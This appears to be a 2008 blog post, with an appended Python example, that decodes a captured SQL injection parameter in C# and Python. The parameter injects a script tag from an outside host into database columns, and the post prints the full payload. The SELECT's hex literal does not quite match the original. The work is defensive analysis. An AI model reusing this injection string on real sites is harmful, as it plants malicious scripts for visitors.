∈鱼杆 --- My Fish Pond


Decoding a SQL Injection Script with C#

Posted on 2008-07-21 09:00 by ∈鱼杆

The parameter that was submitted looked roughly like this:

exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3C2F7363726970743E3C212D2D%20aS%20vArChAr(67))')%20f"

1: Seeing %20 and %2b, this is clearly URL encoding; decoding it with the Server.UrlDecode method gives:
exec('UpDaTe ['+@t+'] sEt ['+@c+']=rtrim(convert(varchar,['+@c+']))+cAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3C2F7363726970743E3C212D2D aS vArChAr(67))') f

2: You can clearly see that the part cAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3C2F7363726970743E3C212D2D aS vArChAr(67)) is encoded as well. The 0x prefix means it is hexadecimal.
The simplest approach is to run this in MSSQL:

SELECT cast(0x223E223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3C2F7363726970743E3C212D2D aS vArChAr(67))

and you get the following result:

">"></title><script src=http://s.see9.us/s.js></script><!--

But to make this easier in the future, I wrote a small piece of C# code:
public static string Decode(string hex)
{
    // Accept the literal as it appears in the injected SQL ("0x223E...") or bare hex digits
    if (hex.StartsWith("0x", global::System.StringComparison.OrdinalIgnoreCase))
        hex = hex.Substring(2);

    // Each pair of hex digits is one byte; CAST(... AS VARCHAR) in MSSQL turns each byte into one character
    var result = new global::System.Text.StringBuilder(hex.Length / 2);
    for (int i = 0; i < hex.Length / 2; i++)
    {
        result.Append((char)byte.Parse(hex.Substring(i * 2, 2), global::System.Globalization.NumberStyles.HexNumber));
    }
    return result.ToString();
}
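The two steps above (URL-decode, then hex-decode the CAST literal) automated over the logged parameter, plus extraction of the script URL the payload would load, which is the indicator a defender blocks and hunts for. This is an added example, not the post's code; the function names, the regular expressions and the script-source extraction are assumptions of this example, and RAW_PARAM is the parameter quoted in the post.

```python
import re
from urllib.parse import unquote_plus

# The parameter value exactly as shown in the post (constructed input for this example).
RAW_PARAM = (
    "exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim(convert(varchar,"
    "['%2b@c%2b']))%2bcAsT(0x223E3C2F7469746C653E3C736372697074207372633D6874"
    "74703A2F2F732E736565392E75732F732E6A733E3C2F7363726970743E3C212D2D%20aS"
    "%20vArChAr(67))')%20f\""
)

# Hex literal inside CAST(0x... AS VARCHAR(n)); IGNORECASE because the payload mixes case.
HEX_CAST = re.compile(r"cast\s*\(\s*0x([0-9a-f]+)\s+as\s+varchar", re.IGNORECASE)
# External script URL in the recovered HTML: the indicator to block and hunt for.
SCRIPT_SRC = re.compile(r"<script[^>]*\ssrc=[\"']?([^\s\"'>]+)", re.IGNORECASE)


def url_decode(param: str) -> str:
    """Step 1: undo %xx encoding; '+' becomes a space, as Server.UrlDecode does."""
    return unquote_plus(param)


def hex_to_text(hex_literal: str) -> str:
    """Step 2: produce what MSSQL's CAST(0x... AS VARCHAR) yields.
    VARCHAR is single-byte, so latin-1 maps each byte to one char like the post's (char) cast."""
    digits = hex_literal[2:] if hex_literal.lower().startswith("0x") else hex_literal
    return bytes.fromhex(digits).decode("latin-1")


def recover_payloads(param: str) -> list[str]:
    """Both steps over one logged parameter: every hidden payload it carries, in order."""
    sql = url_decode(param)
    return [hex_to_text(h) for h in HEX_CAST.findall(sql)]


def script_sources(payload: str) -> list[str]:
    """URLs of the scripts a recovered payload would load into every affected page."""
    return SCRIPT_SRC.findall(payload)


if __name__ == "__main__":
    for payload in recover_payloads(RAW_PARAM):
        print("decoded payload :", payload)
        print("script sources  :", script_sources(payload))
```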